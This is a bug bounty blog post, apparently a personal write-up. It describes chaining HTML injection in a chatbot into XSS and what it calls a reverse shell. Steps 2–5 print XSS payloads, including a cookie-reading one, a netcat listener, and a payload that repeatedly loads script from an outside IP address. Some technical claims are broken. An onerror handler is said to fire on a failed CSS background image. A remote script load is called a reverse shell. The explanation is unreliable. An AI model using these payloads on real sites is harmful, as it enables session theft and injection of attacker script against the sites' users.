The Ultimate Guide to Chaining Bugs: How I Found a Reverse Shell in a Bug Bounty Program

Bug Bounty Hunting

Hello there, and welcome back to my blog!

In this article, I’ll share how I successfully chained an HTML injection into a reverse shell during a bug bounty program. Let’s dive in.

Introduction

I’m Pronay Biswas, a security researcher and bug bounty hunter from West Bengal, India. Recently, I discovered a critical vulnerability by chaining HTML injection to achieve a reverse shell. Here’s a step-by-step account of my journey.

Step 1: Program Selection and Subdomain Enumeration

I chose a program from Bugcrowd and started enumerating subdomains using my subdomain enumuration tool, subdomaindive. To identify live subdomains, I used the httpx tool and selected a target subdomain for further exploration. Let’s assume that the subdomain is blog.example.com.

Step 2: Initial Exploration and HTML Injection

Upon visiting the selected subdomain, I found a chatbot feature. Based on my previous experiences with XSS in chatbots, I tested the following XSS payload, but it didn’t work.

<script>alert(1)</script>

Then I tried an HTML injection payload, which worked.

<h1>Click here</h1>

Step 3: Chaining HTML Injection with XSS

The HTML Injection bug typically falls into the P4 category. As a result, its impact is minimal. I combined it with an XSS payload to try to enhance its impact.

<h1 onmouseover="alert(document.domain)">Click here</h1>

Once the payload has been injected, it creates an h1 heading Click here. When hovering the cursor over Click here, an alert with the domain name was triggered.

Step 4: Reading Cookies with XSS

As a next step, I tested another payload to display the value of the cookie and able to read it successfully.

<h1 onmouseover="alert(document.cookie)">Click here</h1>

The bug promoted to P2 after the HTML injection chained with XSS.

Step 5: Elevating to P1 with Reverse Shell

To increase impact and move on to the P1 bug, I crafted a reverse shell connection payload. On my VPS server, I have set up a Netcat listener as follows:

nc -lvp 4444

Then inject the payload below into the chatbot input field:

<h1 style="background:url('nonexistentimage.png')" onerror=setInterval(function(){with(document)body.appendChild(createElement('script')).src='//3.6.115.64:14806'},999)>Test</h1>

In this payload, the browser’s attempt to load nonexistentimage.png as a background image failed, triggering the onerror event and establishing a reverse shell connection to the VPS server.

Conclusion

Using HTML injection with XSS to create a reverse shell, I was able to increase the impact of this bug significantly, showing the potential dangers this type of attack poses.

Stay tuned for more updates and insights into my bug bounty journey. Until next time, happy hunting!!!